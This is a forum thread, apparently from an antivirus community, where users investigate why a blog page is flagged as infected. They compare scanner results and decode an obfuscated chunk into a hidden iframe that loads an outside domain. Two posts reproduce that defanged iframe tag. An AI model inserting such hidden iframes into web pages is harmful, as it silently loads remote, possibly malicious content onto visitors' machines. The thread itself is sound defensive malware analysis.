Really infected via tweetmeme or only part of the code flagged?

[polonus]

Hi malware fighters,

I got a "Sign of "HTML:iFrame - FW [Trj]"has been found in ".... " by avast
But when I scan the site with WepaWet I will get "benig" as a result, see here:
http://wepawet.iseclab.org/view.php?hash=6e67c2014e0b33bb0aadf3655d28e5e5&t=1269893173&type=js
Then with an unmasked parasites check that gives the site as clean;
Norton Safe Web also produces an all green for this site;
Investigating further into what could be the culprit of this I got
iFrames found: (novirusthanks iFrame checker)
hxtp://api.tweetmeme.com/button.js?url=hxtp%3A%2F%2Fwww.prelovac.com%2Fvladimir%2Fwarning-website-virus-attack&source=vprelovac&style=compact&service=su.pr
Guess this was what avast flagged? Because a redirect to malcode via tweetmeme was found,
a method recently ofter used to redirect to malicious software (Gzip-data)
Complete iFrame report:
No zeroiframes detected!
Check took 5.92 seconds

(Level: 0) Url checked:
hxtp://www.prelovac.com/vladimir/warning-website-virus-attac
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxtp://No zeroiframes detected!
Check took 5.92 seconds

(Level: 0) Url checked:
hxtp://www.prelovac.com/vladimir/warning-website-virus-attack
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htxtp://api.tweetmeme.com/button.js?url=http://www.prelovac.com/vladimir/warning-website-virus-attack&source=vprelovac&style=compact&service=su.pr
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/jquery/jquery.js?ver=1.3.2
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/comment-reply.js?ver=20090102
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-content/themes/imbue/library/scripts/thematic-dropdowns.js
Zeroiframes detected on this site: 0
No ad codes identified
?url=http://www.prelovac.com/vladimir/warning-website-virus-attack&source=vprelovac&style=compact&service=su.pr
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/jquery/jquery.js?ver=1.3.2
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-includes/js/comment-reply.js?ver=20090102
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.prelovac.com/vladimir/wp-content/themes/imbue/library/scripts/thematic-dropdowns.js
Zeroiframes detected on this site: 0
No ad codes identified
Now the results"
Only avast and GData give the site as infected here:
http://scanner.novirusthanks.org/analysis/8e932819aeb409f8fead77b151bf1309/d2FybmluZy13ZWJzaXRlLXZpcnVzLWF0dGFj/
Avast   100328-0   4.8.1368                             HTML:IFrame-FW [Trj]
G-Data            19.9309        2.0.7309.847     HTML:IFrame-FW [Trj] B
chapeau avast!  

polonus

[psw]

Problem is htat this Avast message is corresponding to a chunk of binary code analized by gzip unpacker. This binary code can be found in _avast5_ subdirectory of system TEMP as unpXXXXXX.tmp file. This file is present while Avast virus warning message is displayed. Scanning this file by File System Shield gives the same warning message. So the key question is what is this chunk of binary code - FP or not?

P.S. This is virustotal result of binary code analisys
http://www.virustotal.com/ru/analisis/883592905728d82e97ea2e99110eae30f278f641e9518df06e634c46573cc03c-1269920524

[polonus]

Hi pws,

I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

pozdrawiam,

Damian

[psw]

I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

This code is reduced to the following:
<iframe src='hXXp://trueringtones.net/search.cgi?baagirl&'+Math.round(Math.random()*6369)+'20' width=11 height=579 style='display: none'></iframe>

[polonus]

Hi psw,

For this see: http://jsunpack.jeek.org/dec/go?report=f6384d3da0d85932713de7cc55c20861a234a906

The unobfuscated data you gave produced wrong parameters and errors (must be on purpose); what happened actually when you run it you will get a re-direct to hxtp://www.hugedomains/com/domain_profile.cfm?d=trueringtonese =netdetected

polonus

[DavidR]

I have attached a screen dump of where I had the chunk of obfuscated code in view in malzilla malcode browser.
Any idea what this code is doing?

This code is reduced to the following:
<i f r a m e src='hXXp: / / truerin___ ____gtones.net/search.cgi?baagirl&'+Math.rou nd(Math.rand om()*6369)+'20' width=11 hei ght=579 style='dis play: no ne'>< / i f r a m e >

Posting the actual suspect tag, even with the very slight change hXXp could still result in either the web shield or network shield alerting in the topic. So it is better to use images when posting code to avoid the accidental triggering of the web shield.

[rebies]

Hi guys.  We bought this domain back in September, 2009.  I assume the previous owner was using it for some sort of virus as it sounds you are suggesting?  If you could help me understand what you are saying that would be great.  Overall I know we don't use cgi scripts on our site.  As a domain we own I want to be sure there is nothing we can do on our end...

Thanks.

[rebies]

Sorry - meant to say the domain - trueringtones . net

[DavidR]

I don't know if it has anything to do directly with the domain, but rather the method of obfuscation (image in Reply #s above) of the code employed to generate this iframe and link to display a hidden iframe and import data from trueringtones (which appears to be up for sale).

However avast isn't alone in thinking it is suspect, firefox safe browsing considers it an attack site.